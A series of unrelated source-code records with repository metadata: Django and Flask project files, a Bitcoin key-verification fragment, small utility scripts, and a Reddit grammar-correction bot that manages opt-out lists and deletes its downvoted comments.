    # context manager so the handle is closed (it was previously leaked)
    with open(sys.argv[-1], 'rb') as fp:
        data = fp.read(SIZE)
    assert len(data) == SIZE, "too short"
except Exception:
    # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are
    # not intercepted; the original error is still re-raised after the hint
    print("Need 256k bytes of data originally written during setup.\n")
    raise

# Secret exponent will be the double-SHA256 hash of:
#
#  1) customer data (256k bytes)
#  2) usb serial number of unit (base32 encoding of 128-bit number: 26 chars)
#  3) a random number picked by device (device nonce: 256 bits)
#
should_be = sha256(sha256(data + CHIP_SERIAL + OD_NONCE).digest()).digest()

if should_be != SECRET_EXPONENT:
    print("\nFAILED: You probably didn't record exactly the bytes written to this drive.")
    raise SystemExit

print("STEP1: Secret exponent is hash of things we expected (good).")

# Optional: verify the secret exponent is the basis of the private key
try:
    import pycoin
    from pycoin.key import Key
except ImportError:
    # only a missing module should trigger the install hint
    print("\nNeed pycoin installed for complete check: pip install 'pycoin>=0.76'\n")
    raise SystemExit

# pull out the secret exponent from the provided private key
k = Key.from_text(PRIVKEY)
expect = pycoin.encoding.to_bytes_32(k.secret_exponent())

if expect == should_be and k.address() == ADDRESS:
    print("\nSUCCESS: Private key uses secret exponent we expected. Perfect.")
else:
    print("\nFAILED: Something went wrong along the way. Is this the right private key?")
| [
"peter@conalgo.com"
] | peter@conalgo.com |
42cc9b12576207bc472765276c289082274ca608 | 8df3eea11bb8a88a03166e70eb1d77f7e307916c | /manage.py | 35843ce4b130bd95065a9b0106a91706bd69d305 | [] | no_license | geekyAmitchaurasia/djangoproj11 | 7a6acf09a2b7903dcae14d5b24fe2341ace4a8d3 | 9304a112d28dec32a46051216ef2d47b26291710 | refs/heads/master | 2020-03-26T06:35:35.635807 | 2018-08-13T17:38:22 | 2018-08-13T17:38:22 | 144,611,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point: point Django at this
    # project's settings module, then hand the CLI arguments to Django.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoproj11.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
| [
"amitchaurasia37@gmail.com"
] | amitchaurasia37@gmail.com |
46f50d9f595eb37b882f64158e40a5c7fc5d015c | 1118bb87f67c2c619fff06eb8253533fd645dd1e | /Flask Main Server/route/auth.py | 88d66a2e0d7d75e48625eda54ba6259d7849ab60 | [] | no_license | sunsunza2009/Image-Classifier-Web-GUI | c37e4d97d84c63565774f274f47771cc739d5686 | 58ff59a0a9752b72dd411fd996538bc366cfb356 | refs/heads/master | 2022-04-08T19:20:27.200469 | 2020-03-13T10:22:30 | 2020-03-13T10:22:30 | 239,337,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,385 | py | from flask import Blueprint, jsonify, session, request, redirect, url_for, render_template
from database import Database
# Blueprint grouping the authentication routes; the main app registers it.
app = Blueprint('AUTH', __name__)
# Shared database helper used by the login/register views below.
db = Database()
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form; on a valid POST store identity in the session."""
    # Already-authenticated users go straight to the home page.
    if 'username' in session:
        return redirect(url_for('index'))
    if request.method == 'POST':
        username = request.form['username']
        pwd = request.form['password']
        ok, usr_id, apikey = db.login(username, pwd)
        if not ok:
            # Bad credentials: re-show the form with the attempted name.
            return render_template("login.html", user=username)
        session['username'] = username
        session['id'] = usr_id
        session['key'] = apikey
        return redirect(url_for('index'))
    # Plain GET: blank login form.
    return render_template("login.html", user="")
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new account; successful sign-up lands on the login form."""
    if 'username' in session:
        return redirect(url_for('index'))
    if request.method == 'POST':
        username = request.form['username']
        email = request.form['email']
        pwd = request.form['password']
        created = db.register(username, email, pwd)
        # On success show the login page, otherwise redisplay registration,
        # both pre-filled with the attempted username.
        template = "login.html" if created else "register.html"
        return render_template(template, user=username)
    return render_template("register.html", user="")
@app.route('/logout')
def logout():
    """Drop all identity keys from the session and go back home."""
    # pop() with a default is a no-op when the key was never stored.
    for key in ('id', 'username', 'key'):
        session.pop(key, None)
    return redirect(url_for('index'))
"14806377+zugetor@users.noreply.github.com"
] | 14806377+zugetor@users.noreply.github.com |
367d5083a97e5d006b5ed778da35518abfec3376 | 3f50e7f6894fc8eea825502b846dc0967493f7a4 | /doc-src/objects/index.py | 53bceb10edb9127c2df0acace412c55eba5bbc78 | [
"MIT"
] | permissive | bavardage/qtile | 92e62bc3195f3cfb0059afaa3dd008bd490caa6a | c384d354f00c8d025d0eff3e5e292303ad4b4e58 | refs/heads/master | 2021-01-16T00:49:34.141225 | 2009-03-26T16:54:51 | 2009-03-26T16:54:51 | 106,682 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from countershape.doc import *
# Documentation pages in this section, in display order; countershape
# renders each (source file, title) pair.
pages = [
    Page("barsngaps.html", "Bars and Gaps"),
    Page("groups.html", "Groups"),
    Page("layouts.html", "Layouts"),
    Page("screens.html", "Screens"),
    Page("widgets.html", "Widgets"),
]
| [
"aldo@nullcube.com"
] | aldo@nullcube.com |
dffb8f1d28234925bf2aa668f60bba767b675746 | f1a5d89b17e3bf0f354546cc47c329a81f15dfc9 | /apps/__init__.py | 9827ad08f3307fbdc79dfbb87ce314af564b62c8 | [] | no_license | lucassimon/civilizations | 067193e17e7651a9fecb53f2b6e459c15ff4c97b | db8db27bb56ccda8c23059de88c60ef8d9670cb0 | refs/heads/master | 2020-03-29T13:16:01.025175 | 2018-12-29T18:22:45 | 2018-12-29T18:22:45 | 149,949,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # -*- coding: utf-8 -*-
# Python Libs.
from vibora import Vibora, Response
# -*- coding: utf-8 -*-
from vibora.hooks import Events
from .config import config
from .api import api
def create_app(config_name):
    """Build and configure a Vibora application for *config_name*."""
    application = Vibora()

    @application.handle(Events.AFTER_ENDPOINT)
    async def _stamp_custom_header(response: Response):
        # Tag every outgoing response with the demo header.
        response.headers['x-my-custom-header'] = 'Hello :)'

    # Register the configuration component for the requested profile.
    application.components.add(config[config_name]())
    # Mount the API blueprint under the /v1 prefix.
    application.add_blueprint(api, prefixes={'v1': '/v1'})
    return application
| [
"lucassrod@gmail.com"
] | lucassrod@gmail.com |
574e02bc0618918ca8d833a05d6771caed6c0d4b | 7871437a6174b73a2e9a1bf1e7cc73288923bae1 | /StackHack/StackHack/urls.py | 82ae4f03e832ccfa11bff8c030c43939d6893161 | [] | no_license | HarshilShrivastava/StackHAck | f4e0a22a9addbd8cc843be639e869fcc9730aefb | d1c5fc67be592cf2e0b279f03c24b0a71bef7cb4 | refs/heads/master | 2023-08-15T14:13:49.288802 | 2021-04-12T04:25:19 | 2021-04-12T04:25:19 | 266,839,559 | 0 | 0 | null | 2021-09-22T19:05:48 | 2020-05-25T17:25:48 | JavaScript | UTF-8 | Python | false | false | 923 | py | """StackHack URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from user.api.v0.views import index
# URL routing table for the project.
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path('user/',include('user.api.v0.urls')),  # user API, version 0
    path('Todo/',include('todo.api.v0.urls')),  # todo API, version 0
    path('',index,name="homepage")  # site landing page
]
| [
"Shrivastavahharshil12@gmail.com"
] | Shrivastavahharshil12@gmail.com |
d4a4964518e94e04e43b8698be6b2709644b4fcf | 6fb0f2454da536882d195faded18656ea8074ed4 | /django_ltree_utils/forms.py | 73f8eea2b65952321b5671103a2e3bb6c8936c12 | [
"BSD-3-Clause"
] | permissive | CDavantzis/django-ltree-utils | f401827259c27172f548a4374baea49beb0b09a9 | 97ff0e221743ed47bd2e690ae3ee969bc100c1ef | refs/heads/master | 2023-07-17T01:19:18.664758 | 2021-08-25T16:57:03 | 2021-08-25T16:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py | from django import forms
def move_node_form_factory(manager):
    """Build a ModelForm class for moving nodes handled by *manager*.

    The form adds a ``position`` choice and an optional ``relative_to``
    node reference; saving applies the resolved tree moves before the
    regular model save.
    """
    class Form(forms.ModelForm):
        position = forms.ChoiceField(choices=manager.Position.choices)
        relative_to = forms.ModelChoiceField(
            queryset=manager.all(), required=False
        )

        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            if self.instance and self.instance.path:
                # A node must not be moved under itself: exclude its whole
                # subtree from the candidate targets.
                self.fields['relative_to'].queryset = manager.exclude(
                    **{f'{manager.path_field}__descendant_of': getattr(self.instance, manager.path_field)}
                )
            # Pre-select the node's current placement.
            position, relative_to = manager._get_relative_position(self.instance)
            self.fields['position'].initial = position
            self.fields['relative_to'].initial = relative_to

        class Meta:
            model = manager.model
            exclude = [manager.path_field]

        def clean(self, *args, **kwargs):
            cleaned_data = super().clean(*args, **kwargs)
            if self.errors:
                # Field-level validation already failed; the cross-field
                # logic below would only mask that with a KeyError on the
                # missing cleaned_data entries.
                return cleaned_data
            position = cleaned_data['position']
            relative_to = True if manager.Position(position) == manager.Position.ROOT else cleaned_data.get('relative_to')
            moves = manager._resolve_position(
                self.instance, {
                    position: relative_to
                }
            )
            self.cleaned_data['_moves'] = moves
            return cleaned_data

        def save(self, *args, **kwargs):
            # Apply the computed tree moves before the regular model save.
            manager._bulk_move(self.cleaned_data['_moves'])
            return super().save(*args, **kwargs)

    return Form
| [
"john.parton.iv@gmail.com"
] | john.parton.iv@gmail.com |
84f76a870e2ebb01edf941894ff23d363415fefc | ba9174be0c9312f2e34be1ba512db8bc1c71b024 | /lesson3/mysql/lesson0/app1.py | d07095dad09f55e3a33948397f4b8eef7fe39c54 | [] | no_license | Aliazhari/web-dev-python | 8105caa97e9619ac67cce3c634c0775f8409a10e | 1e5c76cdb63a0bd43d0747a153944f2a71ae7ca0 | refs/heads/master | 2020-04-17T09:59:31.903817 | 2019-05-15T20:48:48 | 2019-05-15T20:48:48 | 166,483,161 | 0 | 1 | null | 2019-01-22T03:59:21 | 2019-01-18T23:00:05 | Python | UTF-8 | Python | false | false | 220 | py | # Author: Ali Azhari
import mysql.connector
# Connect to the local MySQL server and list the databases it exposes.
# NOTE(review): credentials are hard-coded for this lesson; real code
# should load them from configuration, not source.
mydb = mysql.connector.connect(
    host="localhost",
    user="ali",
    passwd="ali"
)
try:
    mycursor = mydb.cursor()
    mycursor.execute("SHOW DATABASES")
    # Each row is a 1-tuple holding one database name.
    for x in mycursor:
        print(x)
finally:
    # The original never closed the connection; release it even on error.
    mydb.close()
"Aliazhari@hotmail.com"
] | Aliazhari@hotmail.com |
84f2ef9d7c6e1bbc2b274b9267ce6316e3588d2d | 7d915f17983f2585cf600c1b97ae060dd48967b0 | /WordCounter/Untitled.py | c1572e72b164c8b62a318d5a01aa39c75266c519 | [] | no_license | aduxhi/learnpython | ca8b241d0b945fa29a53ba9a3ccb46640799e141 | b72144c258d07915936908214ec0a1bcd8a0c56a | refs/heads/master | 2022-12-13T03:44:35.136137 | 2020-09-02T14:24:42 | 2020-09-02T14:24:42 | 291,760,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | from os import path
from wordcloud import WordCloud
from collections import Counter
import jieba
# Locate the input text next to this script.
d = path.dirname(__file__)
# Read the whole report with a context manager so the handle is closed
# (the original leaked it).  NOTE(review): no encoding is given, so the
# platform default is used — confirm the .txt matches that encoding.
with open(path.join(d, '十九大报告.txt')) as src:
    f = src.read()
# Segment the Chinese text into words.
words = list(jieba.cut(f))
# Keep only the 50 most frequent words, as {word: count}.
data = dict(Counter(words).most_common(50))
with open("十九大词频.txt", 'w', encoding='utf-8') as fw:
    for k, v in data.items():
        fw.write("%s\t%d\n" % (k, v))
print('hello\tworld')
"aduxhi@aduxhideMBP.lan1"
] | aduxhi@aduxhideMBP.lan1 |
01d1ca7a568a563b1a79e26269f36e7c154cf789 | 31d5098fd714172a82d655f314c8b8ee3d7b13d0 | /autokey/data/ptaylor/cmd-preferences.py | bbd19ea52d0aaa6794a2dc053d80a6e4ae75cf2c | [] | no_license | trxcllnt/ubuntu-setup | cabf75f917115c40a585187f2a0a045c9c1863d6 | 135247f08dcf4709684ec867efd9c494e5b323b0 | refs/heads/master | 2023-08-22T19:23:21.676537 | 2023-08-05T19:04:02 | 2023-08-05T19:04:02 | 197,261,945 | 30 | 9 | null | 2021-11-30T01:10:39 | 2019-07-16T20:22:09 | Shell | UTF-8 | Python | false | false | 115 | py | store.set_global_value('hotkey', '<alt>+,')
store.set_global_value('keycmd', '<ctrl>+,')
engine.run_script('combo') | [
"paul.e.taylor@me.com"
] | paul.e.taylor@me.com |
1a5a3f46a3ef3e94d37b2d4f016f99a117c59da5 | 5704bf1f4e8d3bc0ded23406d5cd0dc93412ea27 | /python/python_questions/locked_binary_tree.py | d4bf97884c0a949bafaa7981567ef64923147dc1 | [] | no_license | apollopower/interview-prep | c6854b0e15a516fe46993f72ca8922f74881ec49 | 4d53b473efc001d41b989131762f0deaee5c7b13 | refs/heads/master | 2020-03-27T08:14:24.951750 | 2019-04-03T20:27:21 | 2019-04-03T20:27:21 | 146,235,471 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | # locked binary tree problem
class TreeNode:
    """Binary tree node that can be locked/unlocked together with its subtree.

    The original `lock` recursed into the children but never set the flag,
    and `unlock` was an empty stub; both are completed here so locking is
    all-or-nothing over a subtree.
    """

    def __init__(self, val):
        self.val = val
        self.locked = False   # True while this node is locked
        self.left = None
        self.right = None

    def is_locked(self):
        """Return True if this node is currently locked."""
        return self.locked

    def lock(self):
        """Lock this node and every node below it.

        Returns False (and changes nothing) when this node is already
        locked, True otherwise.
        """
        if self.is_locked():
            return False
        self.locked = True
        if self.left:
            self.left.lock()
        if self.right:
            self.right.lock()
        return True

    def unlock(self):
        """Unlock this node and every node below it."""
        self.locked = False
        if self.left:
            self.left.unlock()
        if self.right:
            self.right.unlock()
        return True
def add_node(root, val):
    """Insert *val* into the BST rooted at *root* and return the root.

    Values smaller than a node go left; everything else goes right.
    """
    if root is None:
        return TreeNode(val)
    node = root
    while True:
        if val < node.val:
            if node.left is None:
                node.left = TreeNode(val)
                break
            node = node.left
        else:
            if node.right is None:
                node.right = TreeNode(val)
                break
            node = node.right
    return root
# Small demo tree: 10 at the root, 5 to its left, 15 to its right.
root = TreeNode(10)
add_node(root, 5)
add_node(root, 15)
| [
"erthaljonas@gmail.com"
] | erthaljonas@gmail.com |
986d770ae16a5a17ea8ab21a9c8611ad9ec844f3 | e62b1e748582584a5c2a05fff970fe09e72752b4 | /app/migrations/0084_auto_20200312_2145.py | 78c8618744d5f9bd75ef8f090009cc7f7e073750 | [] | no_license | wlodekf/jpk | 5957b515ecbcded9b4f27d6a0785ee89e3a0d585 | 1c200350f57469e890a124d07f741d836d9a0833 | refs/heads/master | 2023-07-10T20:15:11.111276 | 2021-08-11T12:21:14 | 2021-08-11T12:21:14 | 394,978,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.14.dev20170906233242 on 2020-03-12 21:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds two nullable CharFields to the
    # 'plik' model (nullable, so existing rows need no default value).

    dependencies = [
        ('app', '0083_auto_20200304_1321'),
    ]

    operations = [
        migrations.AddField(
            model_name='plik',
            name='kod_systemowy',
            field=models.CharField(max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='plik',
            name='wersja_schemy',
            field=models.CharField(max_length=5, null=True),
        ),
    ]
| [
"wlodekf@softprodukt.com.pl"
] | wlodekf@softprodukt.com.pl |
d4e579745fae8a47e60cc476411f97325d51b3fc | 9a9e47d9cf1f663de411218a533c10bbf288cc9d | /config/wsgi.py | bc1f238dd14822d7df2fe5c0fdcf05f70c23e3ec | [
"MIT"
] | permissive | eyobofficial/Gebeya-Schedule-Bot | 110f862a5e905c127e23ec0ad9bc9406f4180859 | 8c757fa8c26cf5dda6f917997c521d0f37b28aa9 | refs/heads/development | 2022-12-14T10:23:17.323365 | 2019-09-16T18:28:37 | 2019-09-16T18:28:37 | 204,556,349 | 3 | 2 | MIT | 2022-04-22T22:17:15 | 2019-08-26T20:31:16 | Python | UTF-8 | Python | false | false | 442 | py | """
WSGI config for config project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from decouple import config
from django.core.wsgi import get_wsgi_application
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
config("DJANGO_SETTINGS_MODULE")
)
application = get_wsgi_application()
| [
"eyobtariku@gmail.com"
] | eyobtariku@gmail.com |
03a4d393129093fd3cb0de5abf29c81b36c85ec2 | d7d3775e373983c2db3fad814f961a8588e60e64 | /main.py | 527bc3f8eb8a298f867e69f8ef0bcfde405b2016 | [] | no_license | arielbeje/Might_have_meant | 2ed80b7ae789ef2aaca1c336ba0b06ba62d00138 | ebba15010002cbf2a045e9b6ceae40a4da839297 | refs/heads/master | 2021-07-22T19:27:23.324799 | 2017-11-02T14:33:53 | 2017-11-02T14:33:53 | 108,294,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,015 | py | import praw
import json
import os
import time
import datetime
import logging
import traceback
import re
import threading
# Ensure the log file exists before logging is configured to write to it.
if not os.path.isfile('log.txt'):
    f = open('log.txt', 'w+')
    f.close()
logging.basicConfig(filename='log.txt', level=logging.WARNING,
                    format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
# Authenticated client using the 'bot1' section of the local praw config.
reddit = praw.Reddit('bot1')
# Stream source: comments from all of reddit.
subreddit = reddit.subreddit('all')
# Used later to ignore comments created before the bot started.
starttime = time.time()
# The bot's own account, for inspecting its previous comments.
user = reddit.redditor('Might_have_meant')
# NOTE(review): `threshold` and this `comments` listing are not used in the
# visible code before being shadowed/reassigned — confirm they are needed.
threshold = 0
comments = user.comments.new(limit=None)
# False-positive filter: phrases where "might of" is legitimate English
# ("the might of ...", "might of old", ...) or appears inside a quotation.
searchpattern = re.compile("((combined|whole|the( \w+)?) might of)|might of (an?|which|the|necessity|course|heroes|old) |(?P<quot>[\'\"]).*?might of.*?(?P=quot)", re.IGNORECASE)
# Load each persisted tracking list into a module-level global of the same
# name, creating the backing file on first run.
for dblist in ['comments_replied_to', 'users_replied_to', 'subreddit_blacklist', 'user_blacklist', 'sentence_blacklist', 'past_deleted', 'subreddits_commented']:
    if not os.path.isfile(dblist + '.json'):
        globals()[dblist] = []
        # Seed the file with an empty JSON list: a zero-byte file would
        # make the json.load below fail on the next startup.
        with open('%s.json' % dblist, 'w+') as f:
            json.dump([], f)
    else:
        with open('%s.json' % dblist, 'r') as f:
            globals()[dblist] = json.load(f)
'''if not os.path.isfile('comments_replied_to.json'):
comments_replied_to = []
else:
with open('comments_replied_to.json', 'r') as f:
comments_replied_to = json.load(f)
comments_replied_to = list(filter(None, comments_replied_to))
if not os.path.isfile('users_replied_to.json'):
users_replied_to = []
else:
with open('users_replied_to.json', 'r') as f:
users_replied_to = json.load(f)
users_replied_to = list(filter(None, users_replied_to))
if not os.path.isfile('subreddit_blacklist.json'):
subreddit_blacklist = []
else:
with open('subreddit_blacklist.json', 'r') as f:
subreddit_blacklist = json.load(f)
subreddit_blacklist = list(filter(None, subreddit_blacklist))
if not os.path.isfile('user_blacklist.json'):
user_blacklist = []
else:
with open('user_blacklist.json', 'r') as f:
user_blacklist = json.load(f)
user_blacklist = list(filter(None, user_blacklist))
if not os.path.isfile('sentence_blacklist.json'):
sentence_blacklist = []
else:
with open('sentence_blacklist.json', 'r') as f:
sentence_blacklist = json.load(f)
sentence_blacklist = list(filter(None, sentence_blacklist))
if not os.path.isfile('past_deleted.json'):
past_deleted = []
else:
with open('past_deleted.json', 'r') as f:
past_deleted = json.load(f)
past_deleted = list(filter(None, past_deleted))
if not os.path.isfile('subreddits_commented.json'):
subreddits_commented = []
else:
with open('subreddits_commented.json', 'r') as f:
subreddits_commented = json.load(f)
subreddits_commented = list(filter(None, subreddits_commented))'''
def updatedb(dbtype):
    """Persist one of the bot's in-memory lists to its JSON file on disk.

    :param dbtype: short code naming which list to flush:
        'cdb' comments_replied_to, 'udb' users_replied_to,
        'ubl' user_blacklist,      'pdl' past_deleted,
        'sbl' subreddit_blacklist, 'scm' subreddits_commented.
    Unknown codes are silently ignored (same behavior as the original
    if/elif chain, which had no final else).
    """
    # Dispatch table replaces six near-identical if/elif branches. The lists
    # themselves live as module globals created by the startup loop above.
    targets = {
        'cdb': 'comments_replied_to',
        'udb': 'users_replied_to',
        'ubl': 'user_blacklist',
        'pdl': 'past_deleted',
        'sbl': 'subreddit_blacklist',
        'scm': 'subreddits_commented',
    }
    if dbtype in targets:
        name = targets[dbtype]
        with open(name + '.json', 'w') as f:
            f.write(json.dumps(globals()[name], sort_keys=True, indent=4))
def runbot():
    """Stream new comments and reply to genuine "might of" typos.

    Runs forever on its own thread; on any error it logs the traceback,
    sleeps a minute, and resumes streaming.
    """
    while True:
        try:
            comments = subreddit.stream.comments()
            for comment in comments:
                content = comment.body
                originalComment = comment
                refresh_counter = 0
                # Walk up to the thread root; the de-dup bookkeeping below is
                # keyed on the root comment's id. Refresh every 9th hop --
                # presumably to limit API calls while staying current.
                while not comment.is_root:
                    comment = comment.parent()
                    if refresh_counter % 9 == 0:
                        comment.refresh()
                    refresh_counter += 1
                if ' might of ' in content.lower():
                    # Reply only when: root not already answered, author not
                    # opted out, posted after bot start, subreddit not opted
                    # out, and the phrase is not legitimate English per
                    # `searchpattern`.
                    if (comment.id not in comments_replied_to and
                        str(comment.author) not in user_blacklist and
                        comment.created > starttime and
                        str(comment.subreddit).lower() not in subreddit_blacklist and
                        searchpattern.search(content) is None):
                        mightofcapt = re.search(".*?(might of).*?", content, flags=re.IGNORECASE).group(1)
                        comment.reply('''> %s
Did you mean might have?
***
^^I ^^am ^^a ^^bot, ^^and ^^this ^^action ^^was ^^performed ^^automatically.
^^| ^^I ^^accept ^^feedback ^^in ^^PMs. ^^|
^^[[Opt-out]](http://np.reddit.com/message/compose/?to=Might_have_meant&subject=User+Opt+Out&message=Click+send+to+opt+yourself+out.) ^^|
^^Moderator? ^^Click ^^[[here]](http://np.reddit.com/message/compose/?to=Might_have_meant&subject=Subreddit+Opt+Out&message=Click+send+to+opt+your+subreddit+out.) to opt out all of your moderated subreddits. ^^|
^^Downvote ^^this ^^comment ^^to ^^delete ^^it. ^^| [^^\[Source ^^Code\]](https://github.com/arielbeje/Might_have_meant) ^^| ^^[[Programmer]](https://np.reddit.com/message/compose/?to=arielbeje)''' % mightofcapt)
                        print('Fixed a commment by /u/' + str(originalComment.author))
                        comments_replied_to.append(comment.id)
                        updatedb('cdb')
                        users_replied_to.append(str(originalComment.author))
                        updatedb('udb')
                        if str(comment.subreddit) not in subreddits_commented:
                            subreddits_commented.append(str(comment.subreddit))
                            updatedb('scm')
        except Exception as e:
            logger.error(traceback.format_exc())
            print("I have encountered an error, and have added it to the log.")
            time.sleep(60)
            continue
def deletepast():
    """Hourly sweep that deletes the bot's own downvoted comments.

    A comment is deleted once its score drops below `threshold` and it is at
    least one hour old (young comments get a grace period to recover).
    NOTE(review): `creatd` is built with fromtimestamp (local time) but
    compared against utcnow() -- a timezone mismatch unless the host runs in
    UTC; confirm the deployment timezone.
    """
    while True:
        comments = user.comments.new(limit=None)
        # print("Deleting downvoted comments...")
        for comment in comments:
            creatd = datetime.datetime.fromtimestamp(comment.created_utc)
            try:
                if(comment.score < threshold and comment.id not in past_deleted and
                   creatd + datetime.timedelta(hours=1) < datetime.datetime.utcnow()):
                    comment.delete()
                    print("Deleted a comment on /r/" + str(comment.subreddit))
                    past_deleted.append(comment.id)
                # elif(creatd + datetime.timedelta(hours=1) > datetime.datetime.utcnow() and
                #      comment.score < threshold and comment.id not in past_deleted):
                #     print("Did not delete <1 hour old comment with ID " + comment.id)
            except Exception as e:
                logger.error(traceback.format_exc())
                print("I have encountered an error, and have added it to the log.")
                continue
        # Persist the deleted-id list once per sweep, then sleep an hour.
        updatedb('pdl')
        time.sleep(3600)
def readpms():
    """Process the bot's inbox: opt-out requests, bans, and fan/hate mail.

    Streams every inbox item forever. Private messages drive the user and
    subreddit opt-out lists; subreddit messages detect bans; comment replies
    are only logged.
    """
    to_mark_read = []
    for item in reddit.inbox.stream():
        # print("Checking message with subject \"%s\"" % item.subject)
        # Branch 1: a direct PM (not a subreddit modmail) from a non-blacklisted user.
        if(isinstance(item, praw.models.Message) and item.author not in user_blacklist and
           not isinstance(item, praw.models.SubredditMessage)):
            # User self opt-out ("+" variant covers the pre-filled compose link).
            if (item.subject.lower() == "user opt out" or
                item.subject.lower() == "user+opt+out"):
                user_blacklist.append(str(item.author))
                updatedb('ubl')
                item.reply("You have been added to the user blacklist of this bot.")
                print("Added /u/" + str(item.author) + " to user blacklist.")
                to_mark_read.append(item)
                reddit.inbox.mark_read(to_mark_read)
                to_mark_read = []
            # Moderator opt-out: blacklist every commented subreddit they moderate.
            elif (item.subject.lower() == "subreddit opt out" or
                  item.subject.lower() == "subreddit+opt+out"):
                subreddits_toblacklist = []
                for subr in subreddits_commented:
                    if (item.author in reddit.subreddit(subr).moderator() and
                        str(subr).lower() not in subreddit_blacklist):
                        subreddit_blacklist.append(str(subr).lower())
                        updatedb('sbl')
                        subreddits_toblacklist.append(str(subr))
                if subreddits_toblacklist != []:
                    # Build a human-readable "/r/x, /r/y" style list for the reply.
                    # NOTE(review): "/r/" is appended AFTER each name -- looks
                    # like it was meant to be prepended; confirm intended output.
                    subreddits_toblacklist = [s + "/r/" for s in subreddits_toblacklist]
                    subreddits_toblacklist = re.sub("[\\['\\]]", '', str(list(subreddits_toblacklist)))
                    item.reply("I have added %s to my subreddit blacklist." % subreddits_toblacklist)
                    print("Added %s to subreddit blacklist." % subreddits_toblacklist)
                    subreddits_toblacklist = []
                else:
                    item.reply("All of your moderated subreddits are already in my blacklist.")
                to_mark_read.append(item)
                reddit.inbox.mark_read(to_mark_read)
                to_mark_read = []
            else:
                # Any other PM: log it, except AutoModerator removal notices,
                # which auto-blacklist the subreddit named in the subject.
                if str(item.author) != "AutoModerator":
                    print("Got a PM from " + str(item.author) + " saying:")
                    print("\"" + str(item.body) + "\"")
                elif (str(item.author) == "AutoModerator" and
                      re.search("Your post in /r/(.*) has been removed!", item.subject) is not None):
                    subreddit_blacklist.append(re.search("Your post in /r/(.*) has been removed!", item.subject).group(1).lower())
                    updatedb('sbl')
                    print("My submission has been removed from /r/%s, and I have added it to the subreddit blacklist."
                          % re.search("Your post in /r/(.*) has been removed!", item.subject).group(1))
                to_mark_read.append(item)
                reddit.inbox.mark_read(to_mark_read)
                to_mark_read = []
        # Branch 2: comment replies -- log compliments ("good bot") with the
        # right article, otherwise log the body or a link to it.
        elif not isinstance(item, praw.models.Message):
            if item.subject == "comment reply":
                if(re.search("^((\w+)( \w+){0,2}) bot(?!.*s)", str(item.body), flags=re.IGNORECASE) is not None and
                   item.body.lower().startswith("fuck ") is False):
                    adjUsed = re.search("^((\w+)( \w+){0,2}) bot(?!.*s)", str(item.body), flags=re.IGNORECASE).group(1)
                    prefix = "said I'm a"
                    if adjUsed[0] in "aeiou":
                        prefix = "said I'm an"
                    if re.search("^\w+st bot", str(item.body), flags=re.IGNORECASE) is not None:
                        prefix = "said I'm the"
                    if re.search("^favou?rite bot", str(item.body), flags=re.IGNORECASE) is not None:
                        prefix = "said I'm his/her"
                    print("/u/" + str(item.author) + " " + prefix + " %s bot."
                          % adjUsed)
                else:
                    # NOTE(review): long bodies (>=200 chars) are printed in
                    # full while short ones get only a link -- likely inverted.
                    if len(str(item.body)) >= 200:
                        print("Got a comment reply from /u/" + str(item.author) +
                              " saying: \"%s\"" % str(item.body))
                    else:
                        print("Got a comment reply from /u/" + str(item.author) +
                              ": https://www.reddit.com/api/info.json?id=" + str(item.fullname))
                to_mark_read.append(item)
                reddit.inbox.mark_read(to_mark_read)
                to_mark_read = []
        # Branch 3: subreddit modmail -- detect bans (subject prefix is 43
        # chars long) and blacklist the subreddit.
        elif isinstance(item, praw.models.SubredditMessage):
            if "You've been banned from participating in" in item.subject:
                subreddit_blacklist.append(item.subject[43:].lower())
                updatedb('sbl')
                print("I have been banned from /r/" + item.subject[43:] +
                      ", and have added it to the subreddit blacklist.")
            else:
                print("Got a subreddit message with the title \"%s\"" % str(item.subject))
            to_mark_read.append(item)
            reddit.inbox.mark_read(to_mark_read)
            to_mark_read = []
if __name__ == '__main__':
    # Launch the three workers -- comment streamer, downvote janitor and
    # inbox reader -- each on its own thread.
    for worker in (runbot, deletepast, readpms):
        threading.Thread(target=worker).start()
| [
"arielb624@gmail.com"
] | arielb624@gmail.com |
